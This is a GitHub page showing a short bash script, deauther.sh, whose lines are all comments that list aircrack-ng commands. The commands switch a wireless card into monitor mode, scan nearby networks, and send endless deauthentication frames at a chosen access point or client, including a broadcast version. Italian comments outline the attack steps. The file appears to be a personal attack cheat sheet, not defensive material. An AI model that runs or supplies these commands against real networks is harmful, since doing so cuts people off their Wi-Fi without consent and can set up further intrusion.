-
Notifications
You must be signed in to change notification settings - Fork 23
Expand file tree
/
Copy pathdeauther.sh
More file actions
25 lines (18 loc) · 742 Bytes
/
Copy pathdeauther.sh
File metadata and controls
25 lines (18 loc) · 742 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/bin/bash
# sudo iwlist wlan0 scan | grep "Address\|Channel:\|ESSID:"
#airmon-ng start wlan0
#airmon-ng start wlan0mon
#airodump-ng wlan0mon
#airodump-ng wlan0mon -w reportAiro -a
#airodump-ng -d <mac-SSID-Target> -c <channel> wlan0mon
#aireplay-ng -0 0(times) -a <mac-SSID-Target> -c <mac-victim-Target> wlan0mon
#aireplay-ng -0 0(times) -a <mac-SSID-Target> wlan0mon (broadcast version)
#accendi
#airmon-ng start wlan0
#airmon-ng start wlan0mon
#scnnerizza e salva in file
#airodump-ng wlan0mon
#attendi 10 secondi e poi killa
#seleziona un mac e deautha
#aireplay-ng -0 0(times) -a <mac-SSID-Target> wlan0mon (broadcast version)
#service networking restart && airmon-ng start wlan0 && airmon-ng stop wlan0mon && ifconfig wlan0 up